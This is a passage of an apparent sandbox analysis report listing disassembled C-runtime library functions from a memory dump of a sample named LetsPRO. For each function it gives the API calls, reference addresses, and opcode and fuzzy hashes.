                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _lock$_getptdstrcmp$CriticalEnterSection__copytlocinfo_nolock__expandlocale_calloc_crt_errno_invalid_parameter_noinfo_unlock
                                        • String ID:
                                        • API String ID: 2630553387-0
                                        • Opcode ID: 6f79c5030e388af4f4da63fc4d2a4451b03abf79fc1b11cb0c9bc4580f8dfbff
                                        • Instruction ID: e4dc80a3f39d5bf779fec60bcfaff69223a3e35021f371eb8bfee48152c4f2c5
                                        • Opcode Fuzzy Hash: 6f79c5030e388af4f4da63fc4d2a4451b03abf79fc1b11cb0c9bc4580f8dfbff
                                        • Instruction Fuzzy Hash: F631BC31B08744DBEB009FA8A844BDD77F4AF65328F20902DE42AA7B91CF74D5488E59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97A1AD Relevance: 12.1, APIs: 8, Instructions: 92COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C90AD9E: _lock.MSVCR100(0000000B,6C90AE08,00000018,6C9773E0,00000000,00000000,00000000), ref: 6C90ADC5
                                        • _errno.MSVCR100(6C97A2F8,00000018,6C97A3A7,?,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A1ED
                                        • __doserrno.MSVCR100(6C97A2F8,00000018,6C97A3A7,?,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A1F8
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002,6C97A2F8,00000018,6C97A3A7,?,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A21A
                                        • _get_osfhandle.MSVCR100(?,00000000,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A220
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A227
                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A22A
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A234
                                        • __dosmaperr.LIBCMT(00000000,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A250
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$DuplicateErrorHandleLast__doserrno__dosmaperr_errno_get_osfhandle_lock
                                        • String ID:
                                        • API String ID: 1055742366-0
                                        • Opcode ID: 45f5bd7e4e83edb90454c13e59a684ac87dbecba84878eeec72647c7506a91bd
                                        • Instruction ID: 77ac7106091d38f5c770db13a14fe4466aac80fc8440eef3063613919fc5d6cc
                                        • Opcode Fuzzy Hash: 45f5bd7e4e83edb90454c13e59a684ac87dbecba84878eeec72647c7506a91bd
                                        • Instruction Fuzzy Hash: 8731C4326056958FDB11CFB4C850ADD7BB1AFAA319F141288D460AF691DF32D945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C956A1E Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _mbsrchr.MSVCR100(6C9A83F4,0000002E,6C9A83F4,00000012), ref: 6C956A37
                                          • Part of subcall function 6C9616C3: __mbsrchr_l.LIBCMT(00000400,6C94F416,00000000,?,6C94EFCD,6C94F416,0000002E,?,?,?,6C94F416,00000400,?), ref: 6C9616D0
                                        • _invalid_parameter_noinfo.MSVCR100(6C9A83F4,00000012), ref: 6C956A4E
                                        • strtoul.MSVCR100(00000001,00000000,00000020,00000000,6C9A83F4,00000012), ref: 6C956A5F
                                        • __ultoa_s.LIBCMT(?,?,00000008,00000020,00000000,6C9A83F4,00000012), ref: 6C956A88
                                        • strcpy_s.MSVCR100(00000001,00000000,?,?,?,?,?,00000000,6C9A83F4,00000012), ref: 6C956A9F
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6C9A83F4,00000012), ref: 6C956AB0
                                        • _errno.MSVCR100(6C956BF8,00000010,6C956C4A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6C956AC7
                                        • _errno.MSVCR100(6C956BF8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6C9A83F4,00000012), ref: 6C956AE2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__invoke_watson__mbsrchr_l__ultoa_s_invalid_parameter_noinfo_mbsrchrstrcpy_sstrtoul
                                        • String ID:
                                        • API String ID: 2319564628-0
                                        • Opcode ID: 127325d2b623add723334d97cc8f91de93522161ce67f5f27b6d2dd76838789e
                                        • Instruction ID: 930288001358d0db3149f2f567104d6f641823b8f0890c46ec21fdfe41a2f3ea
                                        • Opcode Fuzzy Hash: 127325d2b623add723334d97cc8f91de93522161ce67f5f27b6d2dd76838789e
                                        • Instruction Fuzzy Hash: 60210735B40208AEE700DF798C85AEE7778FF65718F504169E924D7B80EF70D919C650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9586EC Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • wcsrchr.MSVCR100(6C9A8448,0000002E,6C9A8448,00000012,00000000), ref: 6C958706
                                        • _invalid_parameter_noinfo.MSVCR100(6C9A8448,00000012,00000000), ref: 6C958721
                                        • _wcstoul.LIBCMT(00000002,00000000,00000020,6C9A8448,00000012,00000000), ref: 6C95873D
                                        • __ultoa_s.LIBCMT(?,?,00000008,00000020,6C9A8448,00000012,00000000), ref: 6C958754
                                        • wcscpy_s.MSVCR100(00000002,00000000,?,?,?,?,?,6C9A8448,00000012,00000000), ref: 6C958768
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6C9A8448,00000012,00000000), ref: 6C95877B
                                        • _errno.MSVCR100(6C9588C8,00000010,6C95891A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6C958792
                                        • _errno.MSVCR100(6C9588C8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6C9A8448,00000012,00000000), ref: 6C9587AD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__invoke_watson__ultoa_s_invalid_parameter_noinfo_wcstoulwcscpy_swcsrchr
                                        • String ID:
                                        • API String ID: 1668553054-0
                                        • Opcode ID: 677f722872c573a618f78ab8ed9b30f5b64db88792c4a96fb1d3b084492ab2c0
                                        • Instruction ID: 67a0ed98884841befd074d9a4aa99054bf34651540ed48be71024173e3e35df0
                                        • Opcode Fuzzy Hash: 677f722872c573a618f78ab8ed9b30f5b64db88792c4a96fb1d3b084492ab2c0
                                        • Instruction Fuzzy Hash: B3210771B40704AEEB04DF798C8ABEE73A8EF64718F50052DE51097A81EB70E9088765
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93FEF9 Relevance: 12.1, APIs: 8, Instructions: 87COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93FF00
                                        • ??3@YAXPAX@Z.MSVCR100(?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF26
                                        • ??3@YAXPAX@Z.MSVCR100(00000000), ref: 6C93FF70
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF84
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF8C
                                        • TlsFree.KERNEL32(?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF96
                                        • ??3@YAXPAX@Z.MSVCR100(00000000,00000004,00000008,00000060,6C944BAC,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FFF0
                                          • Part of subcall function 6C9437A1: InterlockedFlushSList.KERNEL32(?,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C9437AB
                                          • Part of subcall function 6C9437A1: InterlockedFlushSList.KERNEL32(?,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C9437B6
                                          • Part of subcall function 6C9437A1: ??_V@YAXPAX@Z.MSVCR100(?,00000000,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C9437EE
                                          • Part of subcall function 6C9437A1: ??3@YAXPAX@Z.MSVCR100(?,?,00000000,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C9437F4
                                          • Part of subcall function 6C9437A1: ??_V@YAXPAX@Z.MSVCR100(?,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C943805
                                        • InterlockedPopEntrySList.KERNEL32(6C9A55D0,6C9A55DC,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FFF7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??3@$InterlockedList$Flush$EntryFreeH_prolog3
                                        • String ID:
                                        • API String ID: 270503109-0
                                        • Opcode ID: 35e13a2725b7725c2474ccf378d11eeca2f6ab76a0ca59f18738a6dc5dae309b
                                        • Instruction ID: fb62f06284977fb771016620d5db41cb47fc212821bc4c2b53592036a76edcb6
                                        • Opcode Fuzzy Hash: 35e13a2725b7725c2474ccf378d11eeca2f6ab76a0ca59f18738a6dc5dae309b
                                        • Instruction Fuzzy Hash: FE31C2716007129FDB00DFA4C880B59B7B4FF26318F145259E9146BB92CB70E925CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C912400 Relevance: 12.1, APIs: 8, Instructions: 86COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT(00000000,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C912424
                                        • _calloc_crt.MSVCR100(00000001,00000004,?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C912435
                                        • _wcslen.LIBCMT(00000000,?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C912459
                                        • _calloc_crt.MSVCR100(00000001,00000002,?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C91246B
                                        • wcscpy_s.MSVCR100(00000000,00000001,00000000,?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C91247F
                                        • free.MSVCR100(?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C91249D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _calloc_crt_wcslen$freewcscpy_s
                                        • String ID:
                                        • API String ID: 968141106-0
                                        • Opcode ID: 8e474e4f47ed9a1c01f7ebbb03bddf30b9208bff6540b1a3ff174da80ea88fe1
                                        • Instruction ID: ca29f8d1d40f7b65f78ab0e8215006aecbd81217fcfef115aa446aea6a5f8be7
                                        • Opcode Fuzzy Hash: 8e474e4f47ed9a1c01f7ebbb03bddf30b9208bff6540b1a3ff174da80ea88fe1
                                        • Instruction Fuzzy Hash: 87216B7360DB509ADB115B6AA849B6A33FCDF63738F31421EE470A3DD0DB30D8858990
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90B975 Relevance: 12.1, APIs: 8, Instructions: 86stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _strlen.LIBCMT(00000000,?,?,6C90B952), ref: 6C90B991
                                        • _calloc_crt.MSVCR100(00000001,00000004,?,?,6C90B952), ref: 6C90B9A1
                                        • _strlen.LIBCMT(00000000,?,?,?,6C90B952), ref: 6C90B9C8
                                        • _calloc_crt.MSVCR100(00000001,00000001,?,?,?,6C90B952), ref: 6C90B9D9
                                        • strcpy_s.MSVCR100(00000000,00000001,00000000,?,?,?,6C90B952), ref: 6C90B9ED
                                        • free.MSVCR100(?,?,?,6C90B952), ref: 6C90BA0A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _calloc_crt_strlen$freestrcpy_s
                                        • String ID:
                                        • API String ID: 1972913904-0
                                        • Opcode ID: 8b45246c172bbdef180ab70003f1922cc9ac3f7da2eade72acdb0175924e26ea
                                        • Instruction ID: 31e3cf66cbbe438e81b3f9311631732fcc5774c0c7f1300647b1d90ff3758bdd
                                        • Opcode Fuzzy Hash: 8b45246c172bbdef180ab70003f1922cc9ac3f7da2eade72acdb0175924e26ea
                                        • Instruction Fuzzy Hash: 2221057371D6906AEB214B28A804B9E37F9AF5373CF31051DD57453A80DB25D886CA60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C916D0B Relevance: 12.1, APIs: 8, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • __doserrno.MSVCR100(6C916DA8,00000010), ref: 6C916CF9
                                        • __doserrno.MSVCR100(6C916DA8,00000010), ref: 6C9305DC
                                        • _errno.MSVCR100(6C916DA8,00000010), ref: 6C9305E4
                                        • _errno.MSVCR100(6C916DA8,00000010), ref: 6C9305F9
                                        • _invalid_parameter_noinfo.MSVCR100(6C916DA8,00000010), ref: 6C930604
                                        • __doserrno.MSVCR100(6C916DA8,00000010), ref: 6C93060B
                                        • _extend_ioinfo_arrays.LIBCMT ref: 6C930614
                                        • _errno.MSVCR100(6C916DA8,00000010), ref: 6C930621
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_extend_ioinfo_arrays_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3030660385-0
                                        • Opcode ID: ed80db6714bbbe564b6d13285eedf54cf5f345bf10cf5d2ca9297851846c7f34
                                        • Instruction ID: 1a0f54b53caf0740f0d57fed433ca8df7f379d30af7b6ad4b2c599e4f8d12049
                                        • Opcode Fuzzy Hash: ed80db6714bbbe564b6d13285eedf54cf5f345bf10cf5d2ca9297851846c7f34
                                        • Instruction Fuzzy Hash: 9C210431A49694DAD7105FAC88422ED3664EFB232CF21639EC5649BED1DF34C904CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90AA7C Relevance: 12.1, APIs: 8, Instructions: 76COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DecodePointer.KERNEL32(?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120,?,6C90B961), ref: 6C90AA91
                                        • DecodePointer.KERNEL32(?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120,?,6C90B961), ref: 6C90AA9E
                                        • _msize.MSVCR100(00000000,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C90AABB
                                          • Part of subcall function 6C90260A: HeapSize.KERNEL32(00000000,00000000,?,6C90AAC0,00000000,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?), ref: 6C902624
                                        • EncodePointer.KERNEL32(?,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C90AAD7
                                        • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C90AADF
                                        • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C912804
                                        • EncodePointer.KERNEL32(00000000,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C91281A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                        • String ID:
                                        • API String ID: 765448609-0
                                        • Opcode ID: f17a05b480bb11cbd43581b71a436bd8080c4365fd341f718a3d252a4ddc8357
                                        • Instruction ID: 877890233212c45ca8c5672bfec72025735ccdc96bd85b8c482ee23333676b21
                                        • Opcode Fuzzy Hash: f17a05b480bb11cbd43581b71a436bd8080c4365fd341f718a3d252a4ddc8357
                                        • Instruction Fuzzy Hash: 6511063270861AAFDB109F74DC8599A77F9EF46764320057AE805D3A10EB31ED04CAD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C976B07 Relevance: 12.1, APIs: 8, Instructions: 69COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,6C9769BE,?,?), ref: 6C976B13
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9769BE,?,?), ref: 6C976B1E
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(?,?,?,6C9769BE,?,?), ref: 6C976B30
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4106058386-0
                                        • Opcode ID: f3c8209571370456d8b92d7822b1e77a4cbb6553e41eaaf0e42348b383dd563e
                                        • Instruction ID: f2deefd5a198404b8c69a1552574225cbae431b3d74f6f742eba8bf7fd4424e7
                                        • Opcode Fuzzy Hash: f3c8209571370456d8b92d7822b1e77a4cbb6553e41eaaf0e42348b383dd563e
                                        • Instruction Fuzzy Hash: CF118471609144EFDF315FA9EC08B8E3BB9EF827A8F144264E914D6590DB71C944C6A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C902727 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C90273D
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C9027A8
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C9027B8
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C906962
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C908709
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C908711
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C908719
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: DecrementInterlocked
                                        • String ID:
                                        • API String ID: 3448037634-0
                                        • Opcode ID: 5ccea3da81df3b2083f4e99a8652f83899b8436170debe1df5c62651670bc758
                                        • Instruction ID: f990591f63b6b0703a2ad0f36d8d3234a719b9b96ca976f7d838c66efcedfe63
                                        • Opcode Fuzzy Hash: 5ccea3da81df3b2083f4e99a8652f83899b8436170debe1df5c62651670bc758
                                        • Instruction Fuzzy Hash: 0B115175B44B15E7DB049B7ACCC8B4AFBACAF45B5AF14452EE918D7900D774F4008BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C901F90 Relevance: 12.1, APIs: 8, Instructions: 64COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • InterlockedIncrement.KERNEL32(00000001), ref: 6C901FA2
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C90200D
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C90201B
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C90255C
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C902565
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C90256D
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C902575
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: IncrementInterlocked
                                        • String ID:
                                        • API String ID: 3508698243-0
                                        • Opcode ID: 1fb9d4d20cf1eb77c38401f6b5097cc2c002bce2396b10d4c572c302f5178679
                                        • Instruction ID: 4a03f3759c978d5262002c45846bb99ae4c83a8e824fb7f71acde439c3332ff9
                                        • Opcode Fuzzy Hash: 1fb9d4d20cf1eb77c38401f6b5097cc2c002bce2396b10d4c572c302f5178679
                                        • Instruction Fuzzy Hash: 4F113075B48719EBDB00DBAACC88B4AFBACEF0675CF04452AF608D7900D774E4508BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C900263 Relevance: 12.1, APIs: 8, Instructions: 60memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537), ref: 6C900293
                                        • __FF_MSGBANNER.LIBCMT ref: 6C92F277
                                        • __NMSG_WRITE.LIBCMT ref: 6C92F27E
                                        • _callnewh.MSVCR100(00000001,00000001,00000000,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001), ref: 6C92F29D
                                        • _callnewh.MSVCR100(00000001,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C92F2C0
                                        • _errno.MSVCR100(00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15), ref: 6C92F2C6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
